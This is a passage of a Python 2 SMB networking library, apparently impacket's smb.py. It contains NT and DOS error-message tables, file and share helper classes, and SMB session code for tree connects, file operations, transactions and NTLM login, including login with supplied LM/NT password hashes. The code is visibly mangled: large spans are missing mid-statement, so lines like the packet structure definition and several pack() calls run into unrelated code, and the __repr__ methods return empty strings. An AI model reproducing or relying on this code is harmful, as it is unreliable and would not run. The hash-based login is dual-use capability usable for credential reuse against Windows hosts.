an server trust account. Use your global user account or local user account to access this server."), 0x019b: ("STATUS_DOMAIN_TRUST_INCONSISTENT","The name or security ID (SID) of the domain specified is inconsistent with the trust information for that domain."), 0x019c: ("STATUS_FS_DRIVER_REQUIRED","STATUS_FS_DRIVER_REQUIRED"), 0x0202: ("STATUS_NO_USER_SESSION_KEY","There is no user session key for the specified logon session."), 0x0203: ("STATUS_USER_SESSION_DELETED","An unexpected network error occurred."), 0x0204: ("STATUS_RESOURCE_LANG_NOT_FOUND","The specified resource language ID cannot be found in the image file."), 0x0205: ("STATUS_INSUFF_SERVER_RESOURCES","Not enough server storage is available to process this command."), 0x0206: ("STATUS_INVALID_BUFFER_SIZE","The supplied user buffer is not valid for the requested operation."), 0x0207: ("STATUS_INVALID_ADDRESS_COMPONENT","The format of the specified network name is invalid."), 0x0208: ("STATUS_INVALID_ADDRESS_WILDCARD","The format of the specified network name is invalid."), 0x0209: ("STATUS_TOO_MANY_ADDRESSES","The name limit for the local computer network adapter card was exceeded."), 0x020a: ("STATUS_ADDRESS_ALREADY_EXISTS","A duplicate name exists on the network."), 0x020b: ("STATUS_ADDRESS_CLOSED","The specified network name is no longer available."), 0x020c: ("STATUS_CONNECTION_DISCONNECTED","The specified network name is no longer available."), 0x020d: ("STATUS_CONNECTION_RESET","The specified network name is no longer available."), 0x020e: ("STATUS_TOO_MANY_NODES","The name limit for the local computer network adapter card was exceeded."), 0x020f: ("STATUS_TRANSACTION_ABORTED","An unexpected network error occurred."), 0x0210: ("STATUS_TRANSACTION_TIMED_OUT","An unexpected network error occurred."), 0x0211: ("STATUS_TRANSACTION_NO_RELEASE","An unexpected network error occurred."), 0x0212: ("STATUS_TRANSACTION_NO_MATCH","An unexpected network error occurred."), 0x0213: ("STATUS_TRANSACTION_RESPONDED","An unexpected network error occurred."), 0x0214: ("STATUS_TRANSACTION_INVALID_ID","An unexpected network error occurred."), 0x0215: ("STATUS_TRANSACTION_INVALID_TYPE","An unexpected network error occurred."), 0x0216: ("STATUS_NOT_SERVER_SESSION","The network request is not supported."), 0x0217: ("STATUS_NOT_CLIENT_SESSION","The network request is not supported."), 0x0218: ("STATUS_CANNOT_LOAD_REGISTRY_FILE","STATUS_CANNOT_LOAD_REGISTRY_FILE"), 0x0219: ("STATUS_DEBUG_ATTACH_FAILED","STATUS_DEBUG_ATTACH_FAILED"), 0x021a: ("STATUS_SYSTEM_PROCESS_TERMINATED","STATUS_SYSTEM_PROCESS_TERMINATED"), 0x021b: ("STATUS_DATA_NOT_ACCEPTED","STATUS_DATA_NOT_ACCEPTED"), 0x021c: ("STATUS_NO_BROWSER_SERVERS_FOUND","The list of servers for this workgroup is not currently available"), 0x021d: ("STATUS_VDM_HARD_ERROR","STATUS_VDM_HARD_ERROR"), 0x021e: ("STATUS_DRIVER_CANCEL_TIMEOUT","STATUS_DRIVER_CANCEL_TIMEOUT"), 0x021f: ("STATUS_REPLY_MESSAGE_MISMATCH","STATUS_REPLY_MESSAGE_MISMATCH"), 0x0220: ("STATUS_MAPPED_ALIGNMENT","The base address or the file offset specified does not have the proper alignment."), 0x0221: ("STATUS_IMAGE_CHECKSUM_MISMATCH","%1 is not a valid Windows NT application."), 0x0222: ("STATUS_LOST_WRITEBEHIND_DATA","STATUS_LOST_WRITEBEHIND_DATA"), 0x0223: ("STATUS_CLIENT_SERVER_PARAMETERS_INVALID","STATUS_CLIENT_SERVER_PARAMETERS_INVALID"), 0x0224: ("STATUS_PASSWORD_MUST_CHANGE","The user must change his password before he logs on the first time."), 0x0225: ("STATUS_NOT_FOUND","STATUS_NOT_FOUND"), 0x0226: ("STATUS_NOT_TINY_STREAM","STATUS_NOT_TINY_STREAM"), 0x0227: ("STATUS_RECOVERY_FAILURE","STATUS_RECOVERY_FAILURE"), 0x0228: ("STATUS_STACK_OVERFLOW_READ","STATUS_STACK_OVERFLOW_READ"), 0x0229: ("STATUS_FAIL_CHECK","STATUS_FAIL_CHECK"), 0x022a: ("STATUS_DUPLICATE_OBJECTID","STATUS_DUPLICATE_OBJECTID"), 0x022b: ("STATUS_OBJECTID_EXISTS","STATUS_OBJECTID_EXISTS"), 0x022c: ("STATUS_CONVERT_TO_LARGE","STATUS_CONVERT_TO_LARGE"), 0x022d: ("STATUS_RETRY","STATUS_RETRY"), 0x022e: ("STATUS_FOUND_OUT_OF_SCOPE","STATUS_FOUND_OUT_OF_SCOPE"), 0x022f: ("STATUS_ALLOCATE_BUCKET","STATUS_ALLOCATE_BUCKET"), 0x0230: ("STATUS_PROPSET_NOT_FOUND","STATUS_PROPSET_NOT_FOUND"), 0x0231: ("STATUS_MARSHALL_OVERFLOW","STATUS_MARSHALL_OVERFLOW"), 0x0232: ("STATUS_INVALID_VARIANT","STATUS_INVALID_VARIANT"), 0x0233: ("STATUS_DOMAIN_CONTROLLER_NOT_FOUND","Could not find the domain controller for this domain."), 0x0234: ("STATUS_ACCOUNT_LOCKED_OUT","The referenced account is currently locked out and may not be logged on to."), 0x0235: ("STATUS_HANDLE_NOT_CLOSABLE","The handle is invalid."), 0x0236: ("STATUS_CONNECTION_REFUSED","The remote system refused the network connection."), 0x0237: ("STATUS_GRACEFUL_DISCONNECT","The network connection was gracefully closed."), 0x0238: ("STATUS_ADDRESS_ALREADY_ASSOCIATED","The network transport endpoint already has an address associated with it."), 0x0239: ("STATUS_ADDRESS_NOT_ASSOCIATED","An address has not yet been associated with the network endpoint."), 0x023a: ("STATUS_CONNECTION_INVALID","An operation was attempted on a non-existent network connection."), 0x023b: ("STATUS_CONNECTION_ACTIVE","An invalid operation was attempted on an active network connection."), 0x023c: ("STATUS_NETWORK_UNREACHABLE","The remote network is not reachable by the transport."), 0x023d: ("STATUS_HOST_UNREACHABLE","The remote system is not reachable by the transport."), 0x023e: ("STATUS_PROTOCOL_UNREACHABLE","The remote system does not support the transport protocol."), 0x023f: ("STATUS_PORT_UNREACHABLE","No service is operating at the destination network endpoint on the remote system."), 0x0240: ("STATUS_REQUEST_ABORTED","The request was aborted."), 0x0241: ("STATUS_CONNECTION_ABORTED","The network connection was aborted by the local system."), 0x0242: ("STATUS_BAD_COMPRESSION_BUFFER","STATUS_BAD_COMPRESSION_BUFFER"), 0x0243: ("STATUS_USER_MAPPED_FILE","The requested operation cannot be performed on a file with a user mapped section open."), 0x0244: ("STATUS_AUDIT_FAILED","STATUS_AUDIT_FAILED"), 0x0245: ("STATUS_TIMER_RESOLUTION_NOT_SET","STATUS_TIMER_RESOLUTION_NOT_SET"), 0x0246: ("STATUS_CONNECTION_COUNT_LIMIT","A connection to the server could not be made because the limit on the number of concurrent connections for this account has been reached."), 0x0247: ("STATUS_LOGIN_TIME_RESTRICTION","Attempting to login during an unauthorized time of day for this account."), 0x0248: ("STATUS_LOGIN_WKSTA_RESTRICTION","The account is not authorized to login from this station."), 0x0249: ("STATUS_IMAGE_MP_UP_MISMATCH","%1 is not a valid Windows NT application."), 0x0250: ("STATUS_INSUFFICIENT_LOGON_INFO","STATUS_INSUFFICIENT_LOGON_INFO"), 0x0251: ("STATUS_BAD_DLL_ENTRYPOINT","STATUS_BAD_DLL_ENTRYPOINT"), 0x0252: ("STATUS_BAD_SERVICE_ENTRYPOINT","STATUS_BAD_SERVICE_ENTRYPOINT"), 0x0253: ("STATUS_LPC_REPLY_LOST","The security account database contains an internal inconsistency."), 0x0254: ("STATUS_IP_ADDRESS_CONFLICT1","STATUS_IP_ADDRESS_CONFLICT1"), 0x0255: ("STATUS_IP_ADDRESS_CONFLICT2","STATUS_IP_ADDRESS_CONFLICT2"), 0x0256: ("STATUS_REGISTRY_QUOTA_LIMIT","STATUS_REGISTRY_QUOTA_LIMIT"), 0x0257: ("STATUS_PATH_NOT_COVERED","The remote system is not reachable by the transport."), 0x0258: ("STATUS_NO_CALLBACK_ACTIVE","STATUS_NO_CALLBACK_ACTIVE"), 0x0259: ("STATUS_LICENSE_QUOTA_EXCEEDED","The service being accessed is licensed for a particular number of connections. No more connections can be made to the service at this time because there are already as many connections as the service can accept."), 0x025a: ("STATUS_PWD_TOO_SHORT","STATUS_PWD_TOO_SHORT"), 0x025b: ("STATUS_PWD_TOO_RECENT","STATUS_PWD_TOO_RECENT"), 0x025c: ("STATUS_PWD_HISTORY_CONFLICT","STATUS_PWD_HISTORY_CONFLICT"), 0x025e: ("STATUS_PLUGPLAY_NO_DEVICE","The specified service is disabled and cannot be started."), 0x025f: ("STATUS_UNSUPPORTED_COMPRESSION","STATUS_UNSUPPORTED_COMPRESSION"), 0x0260: ("STATUS_INVALID_HW_PROFILE","STATUS_INVALID_HW_PROFILE"), 0x0261: ("STATUS_INVALID_PLUGPLAY_DEVICE_PATH","STATUS_INVALID_PLUGPLAY_DEVICE_PATH"), 0x0262: ("STATUS_DRIVER_ORDINAL_NOT_FOUND","The operating system cannot run %1."), 0x0263: ("STATUS_DRIVER_ENTRYPOINT_NOT_FOUND","The specified procedure could not be found."), 0x0264: ("STATUS_RESOURCE_NOT_OWNED","Attempt to release mutex not owned by caller."), 0x0265: ("STATUS_TOO_MANY_LINKS","An attempt was made to create more links on a file than the file system supports."), 0x0266: ("STATUS_QUOTA_LIST_INCONSISTENT","STATUS_QUOTA_LIST_INCONSISTENT"), 0x0267: ("STATUS_FILE_IS_OFFLINE","STATUS_FILE_IS_OFFLINE"), 0x0275: ("STATUS_NOT_A_REPARSE_POINT","STATUS_NOT_A_REPARSE_POINT"), 0x0EDE: ("STATUS_NO_SUCH_JOB","STATUS_NO_SUCH_JOB"), } dos_msgs = { ERRbadfunc: ("ERRbadfunc", "Invalid function."), ERRbadfile: ("ERRbadfile", "File not found."), ERRbadpath: ("ERRbadpath", "Directory invalid."), ERRnofids: ("ERRnofids", "No file descriptors available"), ERRnoaccess: ("ERRnoaccess", "Access denied."), ERRbadfid: ("ERRbadfid", "Invalid file handle."), ERRbadmcb: ("ERRbadmcb", "Memory control blocks destroyed."), ERRnomem: ("ERRnomem", "Insufficient server memory to perform the requested function."), ERRbadmem: ("ERRbadmem", "Invalid memory block address."), ERRbadenv: ("ERRbadenv", "Invalid environment."), 11: ("ERRbadformat", "Invalid format."), ERRbadaccess: ("ERRbadaccess", "Invalid open mode."), ERRbaddata: ("ERRbaddata", "Invalid data."), ERRres: ("ERRres", "reserved."), ERRbaddrive: ("ERRbaddrive", "Invalid drive specified."), ERRremcd: ("ERRremcd", "A Delete Directory request attempted to remove the server's current directory."), ERRdiffdevice: ("ERRdiffdevice", "Not same device."), ERRnofiles: ("ERRnofiles", "A File Search command can find no more files matching the specified criteria."), ERRbadshare: ("ERRbadshare", "The sharing mode specified for an Open conflicts with existing FIDs on the file."), ERRlock: ("ERRlock", "A Lock request conflicted with an existing lock or specified an invalid mode, or an Unlock requested attempted to remove a lock held by another process."), ERRunsup: ("ERRunsup", "The operation is unsupported"), ERRnosuchshare: ("ERRnosuchshare", "You specified an invalid share name"), ERRfilexists: ("ERRfilexists", "The file named in a Create Directory, Make New File or Link request already exists."), ERRinvalidname: ("ERRinvalidname", "Invalid name"), ERRbadpipe: ("ERRbadpipe", "Pipe invalid."), ERRpipebusy: ("ERRpipebusy", "All instances of the requested pipe are busy."), ERRpipeclosing: ("ERRpipeclosing", "Pipe close in progress."), ERRnotconnected: ("ERRnotconnected", "No process on other end of pipe."), ERRmoredata: ("ERRmoredata", "There is more data to be returned."), ERRinvgroup: ("ERRinvgroup", "Invalid workgroup (try the -W option)"), ERRlogonfailure: ("ERRlogonfailure", "Logon failure"), ERRdiskfull: ("ERRdiskfull", "Disk full"), ERRgeneral: ("ERRgeneral", "General failure"), ERRunknownlevel: ("ERRunknownlevel", "Unknown info level") } server_msgs = { 1: ("ERRerror", "Non-specific error code."), 2: ("ERRbadpw", "Bad password - name/password pair in a Tree Connect or Session Setup are invalid."), 3: ("ERRbadtype", "reserved."), 4: ("ERRaccess", "The requester does not have the necessary access rights within the specified context for the requested function. The context is defined by the TID or the UID."), 5: ("ERRinvnid", "The tree ID (TID) specified in a command was invalid."), 6: ("ERRinvnetname", "Invalid network name in tree connect."), 7: ("ERRinvdevice", "Invalid device - printer request made to non-printer connection or non-printer request made to printer connection."), 49: ("ERRqfull", "Print queue full (files) -- returned by open print file."), 50: ("ERRqtoobig", "Print queue full -- no space."), 51: ("ERRqeof", "EOF on print queue dump."), 52: ("ERRinvpfid", "Invalid print file FID."), 64: ("ERRsmbcmd", "The server did not recognize the command received."), 65: ("ERRsrverror","The server encountered an internal error, e.g., system file unavailable."), 67: ("ERRfilespecs", "The file handle (FID) and pathname parameters contained an invalid combination of values."), 68: ("ERRreserved", "reserved."), 69: ("ERRbadpermits", "The access permissions specified for a file or directory are not a valid combination. The server cannot set the requested attribute."), 70: ("ERRreserved", "reserved."), 71: ("ERRsetattrmode", "The attribute mode in the Set File Attribute request is invalid."), 81: ("ERRpaused", "Server is paused."), 82: ("ERRmsgoff", "Not receiving messages."), 83: ("ERRnoroom", "No room to buffer message."), 87: ("ERRrmuns", "Too many remote user names."), 88: ("ERRtimeout", "Operation timed out."), 89: ("ERRnoresource", "No resources currently available for request."), 90: ("ERRtoomanyuids", "Too many UIDs active on this session."), 91: ("ERRbaduid", "The UID is not known as a valid ID on this session."), 250: ("ERRusempx","Temp unable to support Raw, use MPX mode."), 251: ("ERRusestd","Temp unable to support Raw, use standard read/write."), 252: ("ERRcontmpx", "Continue in MPX mode."), 253: ("ERRreserved", "reserved."), 254: ("ERRreserved", "reserved."), 0xFFFF: ("ERRnosupport", "Function not supported.") } # Error clases ERRDOS = 0x1 error_classes = { 0: ("SUCCESS", {}), ERRDOS: ("ERRDOS", dos_msgs), 0x02: ("ERRSRV",server_msgs), 0x03: ("ERRHRD",hard_msgs), 0x04: ("ERRXOS", {} ), 0xE1: ("ERRRMX1", {} ), 0xE2: ("ERRRMX2", {} ), 0xE3: ("ERRRMX3", {} ), 0xC000: ("ERRNT", nt_msgs), 0xFF: ("ERRCMD", {} ) } def __init__( self, str, error_class, error_code, nt_status = 0): Exception.__init__(self, str) self._args = str if nt_status: self.error_class = error_code self.error_code = error_class else: self.error_class = error_class self.error_code = error_code def get_error_class( self ): return self.error_class def get_error_code( self ): return self.error_code def __str__( self ): error_class = SessionError.error_classes.get( self.error_class, None ) if not error_class: error_code_str = self.error_code error_class_str = self.error_class else: error_class_str = error_class[0] error_code = error_class[1].get( self.error_code, None ) if not error_code: error_code_str = self.error_code else: error_code_str = '%s(%s)' % (error_code) return 'SMB SessionError: class: %s, code: %s' % (error_class_str, error_code_str) # Raised when an supported feature is present/required in the protocol but is not # currently supported by pysmb class UnsupportedFeature(Exception): pass # Contains information about a SMB shared device/service class SharedDevice: def __init__(self, name, type, comment): self.__name = name self.__type = type self.__comment = comment def get_name(self): return self.__name def get_type(self): return self.__type def get_comment(self): return self.__comment def __repr__(self): return '' # Contains information about the shared file/directory class SharedFile: def __init__(self, ctime, atime, mtime, filesize, allocsize, attribs, shortname, longname): self.__ctime = ctime self.__atime = atime self.__mtime = mtime self.__filesize = filesize self.__allocsize = allocsize self.__attribs = attribs try: self.__shortname = shortname[:string.index(shortname, '\0')] except ValueError: self.__shortname = shortname try: self.__longname = longname[:string.index(longname, '\0')] except ValueError: self.__longname = longname def get_ctime(self): return self.__ctime def get_ctime_epoch(self): return self.__convert_smbtime(self.__ctime) def get_mtime(self): return self.__mtime def get_mtime_epoch(self): return self.__convert_smbtime(self.__mtime) def get_atime(self): return self.__atime def get_atime_epoch(self): return self.__convert_smbtime(self.__atime) def get_filesize(self): return self.__filesize def get_allocsize(self): return self.__allocsize def get_attributes(self): return self.__attribs def is_archive(self): return self.__attribs & ATTR_ARCHIVE def is_compressed(self): return self.__attribs & ATTR_COMPRESSED def is_normal(self): return self.__attribs & ATTR_NORMAL def is_hidden(self): return self.__attribs & ATTR_HIDDEN def is_readonly(self): return self.__attribs & ATTR_READONLY def is_temporary(self): return self.__attribs & ATTR_TEMPORARY def is_directory(self): return self.__attribs & ATTR_DIRECTORY def is_system(self): return self.__attribs & ATTR_SYSTEM def get_shortname(self): return self.__shortname def get_longname(self): return self.__longname def __repr__(self): return '' def __convert_smbtime(self, t): x = t >> 32 y = t & 0xffffffffL geo_cal_offset = 11644473600.0 # = 369.0 * 365.25 * 24 * 60 * 60 - (3.0 * 24 * 60 * 60 + 6.0 * 60 * 60) return ((x * 4.0 * (1 << 30) + (y & 0xfff00000L)) * 1.0e-7 - geo_cal_offset) # Contain information about a SMB machine class SMBMachine: def __init__(self, nbname, type, comment): self.__nbname = nbname self.__type = type self.__comment = comment def __repr__(self): return '' class SMBDomain: def __init__(self, nbgroup, type, master_browser): self.__nbgroup = nbgroup self.__type = type self.__master_browser = master_browser def __repr__(self): return '' # Represents a SMB Packet class NewSMBPacket(Structure): structure = ( ('Signature', '"\xffSMB'), ('Command','B=0'), ('ErrorClass','B=0'), ('_reserved','B=0'), ('ErrorCode',' -1: my_name = my_name[:i] # If port 445 and the name sent is *SMBSERVER we're setting the name to the IP. This is to help some old applications still believing # *SMSBSERVER will work against modern OSes. If port is NETBIOS_SESSION_PORT the user better know about *SMBSERVER's limitations if sess_port == 445 and remote_name == '*SMBSERVER': self.__remote_name = remote_host if UDP: self._sess = nmb.NetBIOSUDPSession(my_name, remote_name, remote_host, host_type, sess_port, self.__timeout) else: self._sess = nmb.NetBIOSTCPSession(my_name, remote_name, remote_host, host_type, sess_port, self.__timeout) # Initialize session values (_dialect_data and _dialect_parameters) self.neg_session() # Call login() without any authentication information to # setup a session if the remote server # is in share mode. if (self._dialects_parameters['SecurityMode'] & SMB.SECURITY_SHARE_MASK) == SMB.SECURITY_SHARE_SHARE: self.login('', '') else: self._sess = session self.neg_session(negPacket = negPacket) # Call login() without any authentication information to # setup a session if the remote server # is in share mode. if (self._dialects_parameters['SecurityMode'] & SMB.SECURITY_SHARE_MASK) == SMB.SECURITY_SHARE_SHARE: self.login('', '') def ntlm_supported(self): return False def get_remote_name(self): return self.__remote_name def get_remote_host(self): return self.__remote_host def get_flags(self): return self.__flags1, self.__flags2 def set_flags(self, flags1=None, flags2=None): if flags1 is not None: self.__flags1 = flags1 if flags2 is not None: self.__flags2 = flags2 def set_timeout(self, timeout): self.__timeout = timeout def get_timeout(self): return self.__timeout @contextmanager def use_timeout(self, timeout): prev_timeout = self.set_timeout(timeout) try: yield finally: self.set_timeout(prev_timeout) def get_session(self): return self._sess def get_tid(self): return self.tid def get_fid(self): return self.fid def isGuestSession(self): return self._action & SMB_SETUP_GUEST def doesSupportNTLMv2(self): return self.__isNTLMv2 def __del__(self): if self._sess: self._sess.close() def recvSMB(self): r = self._sess.recv_packet(self.__timeout) return NewSMBPacket(data = r.get_trailer()) def recv_packet(self): r = self._sess.recv_packet(self.__timeout) return SMBPacket(r.get_trailer()) def __decode_trans(self, params, data): totparamcnt, totdatacnt, _, paramcnt, paramoffset, paramds, datacnt, dataoffset, datads, setupcnt = unpack(' 0: # this code is untested password = self.get_ntlmv1_response(ntlm.compute_lmhash(password)) if not unicode_support: if unicode_convert: path = str(path) else: raise Exception('SMB: Can\t conver path from unicode!') smb = NewSMBPacket() smb['Flags1'] = SMB.FLAGS1_PATHCASELESS treeConnect = SMBCommand(SMB.SMB_COM_TREE_CONNECT) treeConnect['Parameters'] = SMBTreeConnect_Parameters() treeConnect['Data'] = SMBTreeConnect_Data() treeConnect['Data']['Path'] = path.upper() treeConnect['Data']['Password'] = password treeConnect['Data']['Service'] = service smb.addCommand(treeConnect) self.sendSMB(smb) while 1: smb = self.recvSMB() if smb.isValidAnswer(SMB.SMB_COM_TREE_CONNECT): # XXX Here we are ignoring the rest of the response return smb['Tid'] return smb['Tid'] def get_uid(self): return self._uid def set_uid(self, uid): self._uid = uid def tree_connect_andx(self, path, password = None, service = SERVICE_ANY, smb_packet=None): if password: # Password is only encrypted if the server passed us an "encryption" during protocol dialect if self._dialects_parameters['ChallengeLength'] > 0: # this code is untested password = self.get_ntlmv1_response(ntlm.compute_lmhash(password)) else: password = '\x00' if not unicode_support: if unicode_convert: path = str(path) else: raise Exception('SMB: Can\t convert path from unicode!') if smb_packet == None: smb = NewSMBPacket() smb['Flags1'] = SMB.FLAGS1_PATHCASELESS else: smb = smb_packet treeConnect = SMBCommand(SMB.SMB_COM_TREE_CONNECT_ANDX) treeConnect['Parameters'] = SMBTreeConnectAndX_Parameters() treeConnect['Data'] = SMBTreeConnectAndX_Data() treeConnect['Parameters']['PasswordLength'] = len(password) treeConnect['Data']['Password'] = password treeConnect['Data']['Path'] = path.upper() treeConnect['Data']['Service'] = service smb.addCommand(treeConnect) # filename = "\PIPE\epmapper" # ntCreate = SMBCommand(SMB.SMB_COM_NT_CREATE_ANDX) # ntCreate['Parameters'] = SMBNtCreateAndX_Parameters() # ntCreate['Data'] = SMBNtCreateAndX_Data() # ntCreate['Parameters']['FileNameLength'] = len(filename) # ntCreate['Parameters']['CreateFlags'] = 0 # ntCreate['Parameters']['AccessMask'] = 0x3 # ntCreate['Parameters']['CreateOptions'] = 0x0 # ntCreate['Data']['FileName'] = filename # smb.addCommand(ntCreate) self.sendSMB(smb) while 1: smb = self.recvSMB() if smb.isValidAnswer(SMB.SMB_COM_TREE_CONNECT_ANDX): # XXX Here we are ignoring the rest of the response self.tid = smb['Tid'] return self.tid self.tid = smb['Tid'] return self.tid # backwars compatibility connect_tree = tree_connect_andx def getDialect(self): return SMB_DIALECT def get_server_name(self): #return self._dialects_data['ServerName'] return self.__server_name def get_session_key(self): return self._dialects_parameters['SessionKey'] def get_encryption_key(self): if self._dialects_data.fields.has_key('Challenge'): return self._dialects_data['Challenge'] else: return None def get_server_time(self): timestamp = self._dialects_parameters['HighDateTime'] timestamp <<= 32 timestamp |= self._dialects_parameters['LowDateTime'] timestamp -= 116444736000000000 timestamp /= 10000000 d = datetime.datetime.utcfromtimestamp(timestamp) return d.strftime("%a, %d %b %Y %H:%M:%S GMT") def disconnect_tree(self, tid): smb = NewSMBPacket() smb['Tid'] = tid smb.addCommand(SMBCommand(SMB.SMB_COM_TREE_DISCONNECT)) self.sendSMB(smb) smb = self.recvSMB() def open(self, tid, filename, open_mode, desired_access): filename = string.replace(filename,'/', '\\') smb = NewSMBPacket() smb['Flags1'] = SMB.FLAGS1_PATHCASELESS smb['Flags2'] = SMB.FLAGS2_LONG_NAMES smb['Tid'] = tid openFile = SMBCommand(SMB.SMB_COM_OPEN) openFile['Parameters'] = SMBOpen_Parameters() openFile['Parameters']['DesiredAccess'] = desired_access openFile['Parameters']['OpenMode'] = open_mode openFile['Parameters']['SearchAttributes'] = ATTR_READONLY | ATTR_HIDDEN | ATTR_ARCHIVE openFile['Data'] = SMBOpen_Data() openFile['Data']['FileName'] = filename smb.addCommand(openFile) self.sendSMB(smb) smb = self.recvSMB() if smb.isValidAnswer(SMB.SMB_COM_OPEN): # XXX Here we are ignoring the rest of the response openFileResponse = SMBCommand(smb['Data'][0]) openFileParameters = SMBOpenResponse_Parameters(openFileResponse['Parameters']) return ( openFileParameters['Fid'], openFileParameters['FileAttributes'], openFileParameters['LastWriten'], openFileParameters['FileSize'], openFileParameters['GrantedAccess'], ) def open_andx(self, tid, filename, open_mode, desired_access): filename = string.replace(filename,'/', '\\') smb = NewSMBPacket() smb['Flags1'] = SMB.FLAGS1_PATHCASELESS smb['Flags2'] = SMB.FLAGS2_LONG_NAMES smb['Tid'] = tid openFile = SMBCommand(SMB.SMB_COM_OPEN_ANDX) openFile['Parameters'] = SMBOpenAndX_Parameters() openFile['Parameters']['DesiredAccess'] = desired_access openFile['Parameters']['OpenMode'] = open_mode openFile['Parameters']['SearchAttributes'] = ATTR_READONLY | ATTR_HIDDEN | ATTR_ARCHIVE openFile['Data'] = SMBOpenAndX_Data() openFile['Data']['FileName'] = filename smb.addCommand(openFile) self.sendSMB(smb) smb = self.recvSMB() if smb.isValidAnswer(SMB.SMB_COM_OPEN_ANDX): # XXX Here we are ignoring the rest of the response openFileResponse = SMBCommand(smb['Data'][0]) openFileParameters = SMBOpenAndXResponse_Parameters(openFileResponse['Parameters']) return ( openFileParameters['Fid'], openFileParameters['FileAttributes'], openFileParameters['LastWriten'], openFileParameters['FileSize'], openFileParameters['GrantedAccess'], openFileParameters['FileType'], openFileParameters['IPCState'], openFileParameters['Action'], openFileParameters['ServerFid'], ) def close(self, tid, fid): smb = NewSMBPacket() smb['Flags1'] = SMB.FLAGS1_PATHCASELESS smb['Flags2'] = SMB.FLAGS2_LONG_NAMES smb['Tid'] = tid closeFile = SMBCommand(SMB.SMB_COM_CLOSE) closeFile['Parameters'] = SMBClose_Parameters() closeFile['Parameters']['FID'] = fid smb.addCommand(closeFile) self.sendSMB(smb) smb = self.recvSMB() if smb.isValidAnswer(SMB.SMB_COM_CLOSE): return 1 return 0 def send_trans(self, tid, setup, name, param, data, noAnswer = 0): smb = NewSMBPacket() smb['Flags1'] = SMB.FLAGS1_PATHCASELESS smb['Flags2'] = SMB.FLAGS2_LONG_NAMES smb['Tid'] = tid transCommand = SMBCommand(SMB.SMB_COM_TRANSACTION) transCommand['Parameters'] = SMBTransaction_Parameters() transCommand['Data'] = SMBTransaction_Data() transCommand['Parameters']['Setup'] = setup transCommand['Parameters']['TotalParameterCount'] = len(param) transCommand['Parameters']['TotalDataCount'] = len(data) transCommand['Parameters']['ParameterCount'] = len(param) transCommand['Parameters']['ParameterOffset'] = 32+3+28+len(setup)+len(name) transCommand['Parameters']['DataCount'] = len(data) transCommand['Parameters']['DataOffset'] = transCommand['Parameters']['ParameterOffset'] + len(param) transCommand['Data']['Name'] = name transCommand['Data']['Trans_Parameters'] = param transCommand['Data']['Trans_Data'] = data if noAnswer: transCommand['Parameters']['Flags'] = TRANS_NO_RESPONSE smb.addCommand(transCommand) self.sendSMB(smb) def trans2(self, tid, setup, name, param, data): data_len = len(data) name_len = len(name) param_len = len(param) setup_len = len(setup) assert setup_len & 0x01 == 0 param_offset = name_len + setup_len + 63 data_offset = param_offset + param_len self.__send_smb_packet(SMB.SMB_COM_TRANSACTION2, self.__is_pathcaseless, SMB.FLAGS2_LONG_NAMES, tid, 0, pack(' 65535: max_raw_size = 65535 read_data = callback(max_raw_size) if not read_data: break read_len = len(read_data) self.__send_smb_packet(SMB.SMB_COM_WRITE_RAW, 0, 0, tid, 0, pack(' 0: infoFields = ntlmChallenge['TargetInfoFields'] av_pairs = ntlm.AV_PAIRS(ntlmChallenge['TargetInfoFields'][:ntlmChallenge['TargetInfoFields_len']]) if av_pairs[ntlm.NTLMSSP_AV_HOSTNAME] is not None: try: self.__server_name = av_pairs[ntlm.NTLMSSP_AV_HOSTNAME][1].decode('utf-16le') except: # For some reason, we couldn't decode Unicode here.. silently discard the operation pass if av_pairs[ntlm.NTLMSSP_AV_DOMAINNAME] is not None: try: if self.__server_name != av_pairs[ntlm.NTLMSSP_AV_DOMAINNAME][1].decode('utf-16le'): self.__server_domain = av_pairs[ntlm.NTLMSSP_AV_DOMAINNAME][1].decode('utf-16le') except: # For some reason, we couldn't decode Unicode here.. silently discard the operation pass type3, exportedSessionKey = ntlm.getNTLMSSPType3(auth, respToken['ResponseToken'], user, password, domain, lmhash, nthash, use_ntlmv2 = use_ntlmv2) if exportedSessionKey is not None: self._SigningSessionKey = exportedSessionKey smb = NewSMBPacket() smb['Flags1'] = SMB.FLAGS1_PATHCASELESS smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY #| SMB.FLAGS2_NT_STATUS # Are we required to sign SMB? If so we do it, if not we skip it if self._SignatureRequired: smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE respToken2 = SPNEGO_NegTokenResp() respToken2['ResponseToken'] = str(type3) # Reusing the previous structure sessionSetup['Parameters']['SecurityBlobLength'] = len(respToken2) sessionSetup['Data']['SecurityBlob'] = respToken2.getData() # Storing some info for later use self.__server_os = sessionData['NativeOS'] self.__server_lanman = sessionData['NativeLanMan'] smb.addCommand(sessionSetup) self.sendSMB(smb) smb = self.recvSMB() self._uid = 0 if smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX): self._uid = smb['Uid'] sessionResponse = SMBCommand(smb['Data'][0]) sessionParameters = SMBSessionSetupAndXResponse_Parameters(sessionResponse['Parameters']) sessionData = SMBSessionSetupAndXResponse_Data(flags = smb['Flags2'], data = sessionResponse['Data']) self._action = sessionParameters['Action'] # If smb sign required, let's enable it for the rest of the connection if self._dialects_parameters['SecurityMode'] & SMB.SECURITY_SIGNATURES_REQUIRED: self._SignSequenceNumber = 2 self._SignatureEnabled = True # Set up the flags to be used from now on self.__flags1 = SMB.FLAGS1_PATHCASELESS self.__flags2 = SMB.FLAGS2_EXTENDED_SECURITY return 1 else: raise Exception('Error: Could not login successfully') def login(self, user, password, domain = '', lmhash = '', nthash = ''): # If we have hashes, normalize them if ( lmhash != '' or nthash != ''): if len(lmhash) % 2: lmhash = '0%s' % lmhash if len(nthash) % 2: nthash = '0%s' % nthash try: # just in case they were converted already lmhash = a2b_hex(lmhash) nthash = a2b_hex(nthash) except: pass if self._dialects_parameters['Capabilities'] & SMB.CAP_EXTENDED_SECURITY: try: self.login_extended(user, password, domain, lmhash, nthash, use_ntlmv2 = True) except: # If the target OS is Windows 5.0 or Samba, let's try using NTLMv1 if (self.get_server_lanman().find('Windows 2000') != -1) or (self.get_server_lanman().find('Samba') != -1): self.login_extended(user, password, domain, lmhash, nthash, use_ntlmv2 = False) self.__isNTLMv2 = False else: raise else: self.login_standard(user, password, domain, lmhash, nthash) self.__isNTLMv2 = False def login_standard(self, user, password, domain = '', lmhash = '', nthash = ''): # Only supports NTLMv1 # Password is only encrypted if the server passed us an "encryption key" during protocol dialect negotiation if self._dialects_parameters['ChallengeLength'] > 0: if lmhash != '' or nthash != '': pwd_ansi = 